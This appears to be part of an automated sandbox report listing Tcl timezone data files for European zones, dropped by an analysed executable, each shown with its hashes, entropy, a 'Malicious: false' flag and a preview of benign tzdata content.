Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Andorra) {. {-9223372036854775808 364 0 LMT}. {-2177453164 0 0 WET}. {-733881600 3600 0 CET}. {481078800 7200 0 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}. {749005200 3600 0 CET}. {764730000 7200 1 CEST}. {780454800 3600 0 CET}. {796179600 7200 1 CEST}. {811904400 3600 0 CET}. {828234000 7200 1 CEST}. {846378000 3600 0 CET}. {859683600 7200 1 CEST}. {877827600 3600 0 CET}. {891133200 7200 1 CEST}. {909277200 3600 0 CET}. {922582800 7200 1 CEST}. {941331600 3600 0 CET}. {9540

C:\Users\user\Desktop\tcl\tzdata\Europe\Athens Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7686
Entropy (8bit):	3.635151038354021
Encrypted:	false
SSDEEP:	96:JAK3+9wAuy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2l:JAKOK1XPzh2kNU4tB715pyzHy1gA
MD5:	D64695F05822EF0DF9E3762A1BC440A0
SHA1:	F17F03CFD908753E28F2C67D2C8649B8E24C35F7
SHA-256:	118289C1754C06024B36AE81FEE96603D182CB3B8D0FE0A7FD16AD34DB81374D
SHA-512:	3C5BDE2004D6499B46D9BAB8DBFDCC1FC2A729EEA4635D8C6CB4279AEE9B5655CE93D2E3F09B3E7295468007FFB5BE6FEC5429501E8FB4D3C2BCC05177C2158A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Athens) {. {-9223372036854775808 5692 0 LMT}. {-2344642492 5692 0 AMT}. {-1686101632 7200 0 EET}. {-1182996000 10800 1 EEST}. {-1178161200 7200 0 EET}. {-906861600 10800 1 EEST}. {-904878000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844477200 7200 1 CEST}. {-828237600 3600 0 CET}. {-812422800 7200 0 EET}. {-552362400 10800 1 EEST}. {-541652400 7200 0 EET}. {166485600 10800 1 EEST}. {186184800 7200 0 EET}. {198028800 10800 1 EEST}. {213753600 7200 0 EET}. {228873600 10800 1 EEST}. {244080000 7200 0 EET}. {260323200 10800 1 EEST}. {275446800 7200 0 EET}. {291798000 10800 1 EEST}. {307407600 7200 0 EET}. {323388000 10800 1 EEST}. {338936400 7200 0 EET}. {347148000 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {4490

C:\Users\user\Desktop\tcl\tzdata\Europe\Belfast Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.827362756219521
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQahs3QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUy70U
MD5:	19134F27463DEDF7E25BC72E031B856F
SHA1:	40D9E60D26C592ED79747D1253A9094FCDE5FD33
SHA-256:	5D31D69F259B5B2DFE016EB1B2B811BD51A1ED93011CBB34D2CF65E4806EB819
SHA-512:	B80202194A9D547AEC3B845D267736D831FB7E720E171265AC3F0074C8B511518952BF686A235E6DDEFC11752C3BD8A48A184930879B68980AC60E9FAECBFB44
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Belfast) $TZData(:Europe/London).

C:\Users\user\Desktop\tcl\tzdata\Europe\Belgrade Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7059
Entropy (8bit):	3.733102701717456
Encrypted:	false
SSDEEP:	96:TX6TRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:TWRNH4Mn82rlo6XIZ9ALeBO
MD5:	841E21EED6229503BF41A858601453B0
SHA1:	6F5632B23F2C710106211FBCD2C17DC40B026BFB
SHA-256:	813B4B4F13401D4F92B0F08FC1540936CCFF91EFD8B8D1A2C5429B23715C2748
SHA-512:	85863B12F17A4F7FAC14DF4D3AB50CE33C7232A519F7F10CC521AC0F695CD645857BD0807F0A9B45C169DD7C1240E026C567B35D1D157EE3DB3C80A57063E8FE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Belgrade) {. {-9223372036854775808 4920 0 LMT}. {-2713915320 3600 0 CET}. {-905824800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-777942000 7200 1 CEST}. {-766623600 3600 0 CET}. {407199600 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CES

C:\Users\user\Desktop\tcl\tzdata\Europe\Berlin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7746
Entropy (8bit):	3.733442486698092
Encrypted:	false
SSDEEP:	96:hgt67dAtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:hiGRNH4Mn82rlo6XIZ9ALeBO
MD5:	D1E45A4660E00A361729FCD7413361C1
SHA1:	BCC709103D07748E909DD999A954DFF7034F065F
SHA-256:	EAD23E3F58706F79584C1F3F9944A48670F428CACBE9A344A52E19B541AB4F66
SHA-512:	E3A0E6B4FC80A8D0215C81E95F9D3F71C0D9371EE0F6B2B7E966744C42FC64055370D322918EEA2917BFBA07030629C4493ADA257F9BD9C9BF6AD3C4A7FB1E70
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Berlin) {. {-9223372036854775808 3208 0 LMT}. {-2422054408 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-776559600 10800 0 CEMT}. {-765936000 7200 1 CEST}. {-761180400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733273200 3600 0 CET}. {-717631200 7200 1 CEST}. {-714610800 10800 1 CEMT}. {-710380800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET

C:\Users\user\Desktop\tcl\tzdata\Europe\Bratislava Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	180
Entropy (8bit):	4.89628096026481
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVtXrAevFVAIgoquXrELyQahcvEB5yQazXrY:SlSWB9IZaM3ymzbAevFVAIgozbELy7cY
MD5:	7C0606BC846344D78A85B4C14CE85B95
SHA1:	CEDFDC3C81E519413DDD634477533C89E8AF2E35
SHA-256:	D7DF89C23D2803683FE3DB57BF326846C9B50E8685CCCF4230F24A5F4DC8E44E
SHA-512:	8F07791DE5796B418FFD8945AE13BAB1C9842B8DDC073ED64E12EA8985619B93472C39DD44DA8FAEF5614F4E6B4A9D96E0F52B4ECA11B2CCA9806D2F8DDF2778
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Prague)]} {. LoadTimeZoneFile Europe/Prague.}.set TZData(:Europe/Bratislava) $TZData(:Europe/Prague).

C:\Users\user\Desktop\tcl\tzdata\Europe\Brussels Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8907
Entropy (8bit):	3.75854119398076
Encrypted:	false
SSDEEP:	96:BMlf+jdXtSYv9HMn2vDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHL:BMQSY1RSTRNH4Mn82rlo6XIZ9ALeBO
MD5:	FA802B103E8829C07AE7E05DE7F3CD1F
SHA1:	46AFB26E3E9102F0544C5294DA67DC41E8B2E8FC
SHA-256:	AEB5860C2F041842229353E3F83CC2FEBC9518B115F869128E94A1605FB4A759
SHA-512:	488CE6B524071D2B72F8AD73C2DC00F5F4C1C3C93F91165BDA0BCCB2B2C644B792C4220B785E84835ABE81584FDC87A1DCDA7679A69318052C3854167CB43C61
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Brussels) {. {-9223372036854775808 1050 0 LMT}. {-2840141850 1050 0 BMT}. {-2450953050 0 0 WET}. {-1740355200 3600 0 CET}. {-1693702800 7200 0 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1613826000 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585530000 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301263200 0 0 WET}. {-1284328800 3600 1 WEST}. {-126

C:\Users\user\Desktop\tcl\tzdata\Europe\Bucharest Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7706
Entropy (8bit):	3.6365022673390808
Encrypted:	false
SSDEEP:	96:nQrdI+sYixX215VaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:nQrbEm1Oh2kNU4tB715pyzHy1gA
MD5:	79AAB44507DD6D06FA673CA20D4CF223
SHA1:	A2F1AA0E3F38EF24CD953C6B5E1EC29EA3EDB8C0
SHA-256:	C40DC0C9EE5FFF9F329823325A71F3F38BE940F159E64E0B0CED27B280C1F318
SHA-512:	BBEBB29FFD35A1F8B9D906795032976B3F69A0097ED7D764E3EB45574E66641C35F9006B3295FB090472FF5C09FC4D88D9249E924011A178EFB68D050AA6F871
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Bucharest) {. {-9223372036854775808 6264 0 LMT}. {-2469404664 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {296604000 10800 1 EEST}. {307486800 7200 0 EET}. {323816400 10800 1 EEST}. {338940000 7200 0 EET}. {354672000 10800 0 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200

C:\Users\user\Desktop\tcl\tzdata\Europe\Budapest Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8034
Entropy (8bit):	3.737391538530933
Encrypted:	false
SSDEEP:	96:ZpduEks56myNPcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:ZpMR4RNH4Mn82rlo6XIZ9ALeBO
MD5:	D936EC68FADE43BCF04AB5508A6E01B0
SHA1:	83907E1799DA84006D407118888C0157A8FB3AB8
SHA-256:	B2498F766171DE4DC8F4D9552B116A3A8691177E59D1C6FF6763C1F69B22B672
SHA-512:	7213AA9994CCDC23CD851C91719EAEEB4F2B31C948BC8CC1DD8E8652CE49EF36286984451EC7F7D180082428FDD3693BAFD938D8F13599445C5DA49D2CAD4536
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Budapest) {. {-9223372036854775808 4580 0 LMT}. {-2500938980 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1640998800 3600 0 CET}. {-1633212000 7200 1 CEST}. {-1617577200 3600 0 CET}. {-1600466400 7200 1 CEST}. {-1587250800 3600 0 CET}. {-1569708000 7200 1 CEST}. {-1554332400 3600 0 CET}. {-906937200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-778471200 7200 1 CEST}. {-762487200 3600 0 CET}. {-749689200 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-686185200 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-621990000 7200 1 CEST}. {-605660400 3600

C:\Users\user\Desktop\tcl\tzdata\Europe\Busingen Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.905738881351689
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVnCMPwVAIgoqkCMJW6yQahDZALMFB5h8Qa5CMP:SlSWB9IZaM3ym5XwVAIgo5Py7D17/8jH
MD5:	811B7E0B0EDD151E52DF369B9017E7C0
SHA1:	3C17D157A626F3AD7859BC0F667E0AB60E821D05
SHA-256:	221C8BA73684ED7D8CD92978ED0A53A930500A2727621CE1ED96333787174E82
SHA-512:	7F980E34BBCBC65BBF04526BF68684B3CE780611090392560569B414978709019D55F69368E98ADADC2C47116818A437D5C83F4E6CD40F4A1674D1CF90307CB5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Busingen) $TZData(:Europe/Zurich).

C:\Users\user\Desktop\tcl\tzdata\Europe\Chisinau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7825
Entropy (8bit):	3.6773421316901067
Encrypted:	false
SSDEEP:	96:J2rdkayurqp4VaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:J2r6Gqpjh2kNU4tB715pyzHy1gA
MD5:	4DD407BF09BEF6999BD16C8426813039
SHA1:	79766397FA1F6986A600C443A8CF4654EB6C3C16
SHA-256:	1F64C2A869CA56DBAAE5AF67B1FACC51BF17ED14D380BC06C252BC07BD9ACFA5
SHA-512:	129D7BFCE88738E5CB9E1EAB0D9EC8FF63329AC712884EE19F11E9C0E55A93F8ACE5C9AD276419F990585FCE4B07A2A1DDF62B54A569CE0170D9A4C85B6F3378
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Chisinau) {. {-9223372036854775808 6920 0 LMT}. {-2840147720 6900 0 CMT}. {-1637114100 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {-927165600 10800 1 EEST}. {-898138800 7200 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-800154000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {4179

C:\Users\user\Desktop\tcl\tzdata\Europe\Copenhagen Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7458
Entropy (8bit):	3.736544358182077
Encrypted:	false
SSDEEP:	96:1Fpd6z8cRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyo:1FpoRNH4Mn82rlo6XIZ9ALeBO
MD5:	8FBF425E5833012C0A6276222721A106
SHA1:	78C5788ED4184A62E0E2986CC0F39EED3801AD76
SHA-256:	D2D091740C425C72C46ADDC23799FC431B699B80D244E4BCD7F42E31C1238EEB
SHA-512:	6DF08142EEBC7AF8A575DD7510B83DBD0E15DDA13801777684355937338CDA3D09E37527912F4EBBCC1B8758E3D65185E6006EB5C1349D1DC3AE7B6131105691
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Copenhagen) {. {-9223372036854775808 3020 0 LMT}. {-2524524620 3020 0 CMT}. {-2398294220 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680490800 3600 0 CET}. {-935110800 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-769388400 3600 0 CET}. {-747010800 7200 1 CEST}. {-736383600 3600 0 CET}. {-715215600 7200 1 CEST}. {-706748400 3600 0 CET}. {-683161200 7200 1 CEST}. {-675298800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528

C:\Users\user\Desktop\tcl\tzdata\Europe\Dublin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9476
Entropy (8bit):	3.729722634283483
Encrypted:	false
SSDEEP:	192:fIfr5ZO/H8XKKRjuBHI2RLQbTaO5drSf72kVHe:fItZO/Hk5RSBHIB5tSf72kVHe
MD5:	49EA614B5BCB8602EF8D9F365FBBE43D
SHA1:	CF477D1759F428EA4C8A5DF89C5D3E0639422CD6
SHA-256:	F686B3AEA13F71ABB8C864B2574441FF8B6F313D6F88FC502C93B89454CF542F
SHA-512:	B9712380CA101A8FA768D06FA7DFA059DA2886E5BAD8806723CE44ECC06990BE65364498C8A37001FDD67608D2AF668FD1A37C5EDD8D4EA3AB63E338F927ADC5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Dublin) {. {-9223372036854775808 -1500 0 LMT}. {-2821649700 -1521 0 DMT}. {-1691962479 2079 1 IST}. {-1680471279 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1517011200 0 0 IST}. {-1507500000 3600 1 IST}. {-1490565600 0 0 IST}. {-1473631200 3600 1 IST}. {-1460930400 0 0 IST}. {-1442786400 3600 1 IST}. {-1428876000 0 0 IST}. {-1410732000 3600 1 IST}. {-1396216800 0 0 IST}. {-1379282400 3600 1 IST}. {-1364767200 0 0 IST}. {-1348437600 3600 1 IST}. {-1333317600 0 0 IST}. {-1315778400 3600 1 IST}. {-1301263200 0 0 IST}. {-1284328800 3600 1 IST}. {-1269813600 0 0 IST}. {-1253484000 3600 1 IST}. {-1238364000 0 0 IST}. {-

C:\Users\user\Desktop\tcl\tzdata\Europe\Gibraltar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9181
Entropy (8bit):	3.7982744899840535
Encrypted:	false
SSDEEP:	96:i2elBN44y3UKdDDMjEZtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIV0:i44y1xZGRNH4Mn82rlo6XIZ9ALeBO
MD5:	F8AEFE8F561ED7E1DC81117676F7D0E0
SHA1:	1148176C2766B205B5D459A620D736B1D28283AA
SHA-256:	FB771A01326E1756C4026365BEE44A6B0FEF3876BF5463EFAB7CF4B97BF87CFC
SHA-512:	7C06CB215B920911E0DC9D24F0DD6E24DEC3D75FB2D0F175A9B4329304C9761FFFEE329DD797FF4343B41119397D7772D1D3DFC8F90C1DE205380DE463F42854
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Gibraltar) {. {-9223372036854775808 -1284 0 LMT}. {-2821649916 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}.

C:\Users\user\Desktop\tcl\tzdata\Europe\Guernsey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.830450830776494
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQakQAL/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyYL5
MD5:	DC2B3CAC4AF70A61D0F4C53288CC8D11
SHA1:	A423E06F88FDEED1960AF3C46A67F1CB9F293CAF
SHA-256:	9CB6E6FEC9461F94897F0310BFC3682A1134E284A56C729E7F4BCE726C2E2380
SHA-512:	8B455DA1D1A7AA1259E6E5A5CF90E62BA8073F769DCB8EB82503F2DFB70AA4539A688DC798880339A2722AA1871E8C8F16D8827064A2D7D8F2F232880359C78D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Guernsey) $TZData(:Europe/London).

C:\Users\user\Desktop\tcl\tzdata\Europe\Helsinki Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7120
Entropy (8bit):	3.6356606479455618
Encrypted:	false
SSDEEP:	96:Uw3XHk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ9A:UuXPzh2kNU4tB715pyzHy1gA
MD5:	7284918DF76869F24B390D05949EDA2C
SHA1:	4B934B91392BB2C2F71DF8ACBCA2F4918031D413
SHA-256:	89AAD5FE56B54A251D823A5F82593D969D8A586E338547E41CDA5F808A3A8C26
SHA-512:	71A51DA5D26206AC80653E4B16C7C11003EE3ED0A15457D2DA3E829239AE0585CA0A6F231E0BCA4AC3E53B297A7C8827E58455345C76AFD8BA5B5DAEA04E9782
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Helsinki) {. {-9223372036854775808 5992 0 LMT}. {-2890258792 5992 0 HMT}. {-1535938792 7200 0 EET}. {-875671200 10800 1 EEST}. {-859863600 7200 0 EET}. {354672000 10800 1 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {410220000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}. {733280400 10800 1 EEST}. {749005200 7200 0 EET}. {764730000

C:\Users\user\Desktop\tcl\tzdata\Europe\Isle_of_Man Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.866592240835745
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQaqpfioxp8QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUycqO
MD5:	9E18F66C32ADDDBCEDFE8A8B2135A0AC
SHA1:	9D2DC5BE334B0C6AEA15A98624321D56F57C3CB1
SHA-256:	6A03679D9748F4624078376D1FD05428ACD31E7CABBD31F4E38EBCCCF621C268
SHA-512:	014BAD4EF0209026424BC68CBF3F5D2B22B325D61A4476F1E4F020E1EF9CD4B365213E01C7EC6D9D40FA422FE8FE0FADB1E4CBB7D46905499691A642D813A379
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London).

C:\Users\user\Desktop\tcl\tzdata\Europe\Istanbul Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8735
Entropy (8bit):	3.6454204515361117
Encrypted:	false
SSDEEP:	96:kICNapz9QnPPWDePrDaQrclxXl9k1dgsh6YlvsUM2kNU4tztagAwkY5V778e27zE:kuQnPoOuX1iCrh2kNU4tB715pyzHy1gA
MD5:	7F1FEE8A214FC908267150BC80CE7260
SHA1:	3950CC97A46CC1678BE35509DB67DB9430710EAE
SHA-256:	98130CD8C6A3CCAE4CC730D3F1C3C94BE157091A187D4A4A1AF1A61DE75F1EC4
SHA-512:	589BE4038D548433A6C698640CD25EE6CF3E9BCB0D8F2080A19E00CCE243D52D61A5CCB2F94B1D60B5AD5A3DFF008EEF87F162626D77E49B0934CDC436A91205
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Istanbul) {. {-9223372036854775808 6952 0 LMT}. {-2840147752 7016 0 IMT}. {-1869875816 7200 0 EET}. {-1693706400 10800 1 EEST}. {-1680490800 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1440208800 10800 1 EEST}. {-1428030000 7200 0 EET}. {-1409709600 10800 1 EEST}. {-1396494000 7200 0 EET}. {-931140000 10800 1 EEST}. {-922762800 7200 0 EET}. {-917834400 10800 1 EEST}. {-892436400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857358000 7200 0 EET}. {-781063200 10800 1 EEST}. {-764737200 7200 0 EET}. {-744343200 10800 1 EEST}. {-733806000 7200 0 EET}. {-716436000 10800 1 EEST}. {-701924400 7200 0 EET}. {-684986400 10800 1 EEST}. {-670474800 7200 0 EET}. {-654141600 10800 1 